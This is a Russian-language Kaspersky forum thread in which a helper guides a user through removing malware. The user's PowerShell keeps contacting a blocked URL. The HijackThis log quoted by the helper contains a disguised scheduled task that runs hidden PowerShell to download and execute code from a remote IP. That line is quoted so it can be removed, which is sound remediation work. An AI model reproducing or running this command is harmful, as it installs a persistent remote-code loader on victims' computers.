Перейти к содержанию
Правила раздела

[РЕШЕНО] Powershell и Yandex Browser пытаются запустить переход по вредоносной ссылке

Maxim228

Автор Maxim228
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

Maxim228

Maxim228

Опубликовано
Опубликовано (изменено)

Проблема в следующем: Powershell иногда запускается и сразу закрывается, после чего антивирус публикует уведомление, что был заблокирован переход по ссылке. 

Много раз запускал проверку на вирусы, никакие угрозы найти не удалось.

Тест сообщения антивируса:

Цитата

Событие: Остановлен переход на сайт
Пользователь: DESKTOP-NDVI5Q2\Максим
Тип пользователя: Инициатор
Имя приложения: powershell.exe
Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
Компонент: Интернет-защита
Описание результата: Запрещено
Тип: Вредоносная ссылка
Название: https://i.404.pm/2024/11/16/1731762779-9803.jpeg
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Веб-страница
Имя объекта: 1731762779-9803.jpeg
Путь к объекту: https://i.404.pm/2024/11/16
Причина: Облачная защита

Помогите устранить проблему пожалуйста(когда писал это сообщение появилось еще 2 уведомления о блокировке).

Дополнение: когда я писал это сообщение касперский жаловался на переход по ссылке, но уже через браузер.

Цитата

Событие: Остановлен переход на сайт
Пользователь: DESKTOP-NDVI5Q2\Максим
Тип пользователя: Инициатор
Имя приложения: browser.exe
Путь к приложению: C:\Users\Максим\AppData\Local\Yandex\YandexBrowser\Application
Компонент: Интернет-защита
Описание результата: Запрещено
Тип: Вредоносная ссылка
Название: https://i.404.pm/2024/11/16/1731762779-9803.jpeg
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Веб-страница
Имя объекта: 1731762779-9803.jpeg
Путь к объекту: https://i.404.pm/2024/11/16
Причина: Облачная защита

 

отчет.txt

Изменено пользователем Maxim228
  • Maxim228 изменил название на Powershell и Yandex Browser пытаются запустить переход по вредоносной ссылке
Sandor

Sandor

Опубликовано
Опубликовано

"Пофиксите" в HijackThis только следующее: 

O22 - Tasks: SecurityHealthSystray - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (irm '130.0.235.242/0x55/3')" (sign: 'Microsoft')

 

Перезагрузите компьютер и соберите новый CollectionLog Автологером.

 

Sandor

Sandor

Опубликовано
Опубликовано

Хорошо, последите и через время сообщите.

 

Пока наблюдаете, сделайте такую проверку:

  • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
  • Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.


 
Sandor

Sandor

Опубликовано
Опубликовано

Исправьте по возможности:

 

AMD Software v.24.9.1 Внимание! Скачать обновления
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 v.14.36.32532.0 Внимание! Скачать обновления
Yandex v.24.12.2.856 Внимание! Скачать обновления
^Проверьте обновления через меню Дополнительно - О браузере Yandex!^
 

---------------------------- [ UnwantedApps ] -----------------------------
Кнопки сервисов Яндекса на панели задач v.3.7.9.0 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
Razer Cortex v.10.16.1.0 Внимание! Подозрение на демо-версию антивредоносной программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии. Компьютерные эксперты не рекомендуют использовать такие программы.
 

  • 2 месяца спустя...
Sandor

Sandor

Опубликовано
Опубликовано

Мы были рады Вам помочь! Надеемся, что Вы остались довольны результатом. На нашем форуме также можно получить компьютерную помощь, помощь по продуктам "Лаборатории Касперкого", обсудить технологии и технику, заказать эксклюзивную сувенирную продукцию "Лаборатории Касперского" бесплатно! Форумчане ежегодно путешествуют. В числе приглашенных в ТурциюАрмениюСочиКамбоджу можете стать и Вы! Будем рады видеть Вас в наших рядах! Всегда ваш, клуб "Лаборатории Касперского".

Гость
Эта тема закрыта для публикации ответов.
 Поделиться
Перейти к списку тем

  • Похожий контент

    • nazarrich
      Угроза DPC:PowerShell.AVKill.10 NET:MINERS.URL
      Автор nazarrich
      Столкнулся с проблемой что словил походу майнер установил dr.web cureit и он нашёл две угрозы DPC:PowerShell.AVKill.10 NET:MINERS.URL и вылечить он не может пытался как то решить не получается
      отчёт.rar
    • Радмир
      Перестал работать интернет
      Автор Радмир
      при вводе запроса в браузере находит сайты скорость интернета показывает нормальная но почти никакие сайты не грузит скорее никакие не знаю что делать я даже не могу скачать антивирус на Пк потому что нет интернета
    • shougo04
      [РЕШЕНО] Подозрительный процесс/файл WinDivert64.sys с описанием схожим на вирус?
      Автор shougo04
      Не заходил в Discord очень долго, увидел на почте gmail что кто-то меня отметил в сообщении, решил глянуть, оказалось Discord не работает, скачал zapretdisyt, он так и не заработал.
      Подумал ладно, не судьба. Удалил zapret и позже удалю и Discord. При удалении zapretdisyt вылезло вот такое сообщение описание файла WinDivert64.sys в котором меня насторожило слово bitcoin, страшно.
       
       
      Прикрепляю логи от программы miderfinder; autologger ниже со скриншотом при удалении файла. 
       

       
      MinerSearch_26.12.2025_3-24-55.logreport2.logreport1.logCollectionLog-2025.12.26-03.20.zip
       
       
      Живу +4 от МСК поэтому смогу ответить только после 08:00 по МСК как встану, пост отправил в 03:33 ночи. Заранее огромное спасибо любому, кто ответит здесь или уделит любой вид внимания этому посту. я вас всех люблю
    • 21_bibon
      Dr.Web cureIt не смог удалить NET:MINERS:URL
      Автор 21_bibon
      Здравствуйте! помогите пожалуйста. Dr web не смог удалить NET:MINERS:URL по пути \net\1748\TCP\91.184.248.138-3333\Device\HarddiskVolume3\Windows\System32\dialer.exe
      CollectionLog-2025.12.09-00.37.zip 
    • 1ceman
      Два explorer.exe в ДЗ
      Автор 1ceman
      Доброго времени суток. Смотрю тут обсуждается тема "ДВУХ ПРОВОДНИКОВ". Я тоже имею такую же проблему. Схватил буквально недавно, где, - так и не понял. (подозрение на какое то обновление Windows)
      Как заметил: если запустить "Диспетчер учетных данных" и закрыть, потом уже не запустишь. Так же почти со всеми остальными параметрами системы. Панель управления тоже не открывается. И так до момента пока не закроешь проводник с меньшим размером в ДЗ. Второй экземпляр проводника в 5 раз меньше "оригинала" и с хвостом C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
      Отсканировал FRST-ом, ничего подозрительного не нашел, кроме пары отключенных политик (брандмауэр и update windows). Пофиксил, пропала надпись бесящая, что вами управляет какая то компании или что-то в этом роде. Теперь могу включать-отключать брандмауэр (до этого не мог).
      Помогите поймать этого червя, сомневаюсь что microsoft прислал такое KB, иначе проблема имела бы массовый характер.
      PS Я продвинутый пользователь, просто так пропустить не мог так внимательно слежу за системой и не "запускаю все подряд" .
      Спасибо.
       
      Сообщение от модератора Mark D. Pearlstone Перемещено из темы.
×
×
  • Создать...